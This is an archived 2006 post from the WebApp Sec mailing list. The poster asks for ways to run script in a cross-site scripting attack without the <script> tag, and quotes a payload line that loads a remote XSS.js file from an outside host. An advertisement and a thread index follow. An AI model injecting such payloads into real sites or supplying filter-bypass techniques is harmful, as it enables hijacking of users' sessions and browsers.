WebApp Sec mailing list archives

XSS - how to run script

From: "Tal Argoni" <moskito () zahav net il>
Date: Thu, 19 Oct 2006 17:42:52 -0700

Does anyone have any 
techniques/knowledge/examples/ideas/etc 
of how it possible to run script 
without using the <script> tag, 
and without evasion techniques ?
<script 
src=http://www.www.com/XSS.js></script>
Thanks allot
LegendaryZion 



-------------------------------------------------------------------------
Sponsored by: Watchfire

Watchfire was recently named the worldwide market leader in Web 
application security assessment tools by both Gartner and IDC. Download a 
free trial of AppScan today and see why more customers choose AppScan 
then any other solution.

https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008YTO
--------------------------------------------------------------------------

Current thread:

XSS - how to run script Tal Argoni (Oct 19)
- Re: XSS - how to run script A. R. (Oct 19)
  - RE: XSS - how to run script Joshua Perrymon (Oct 19)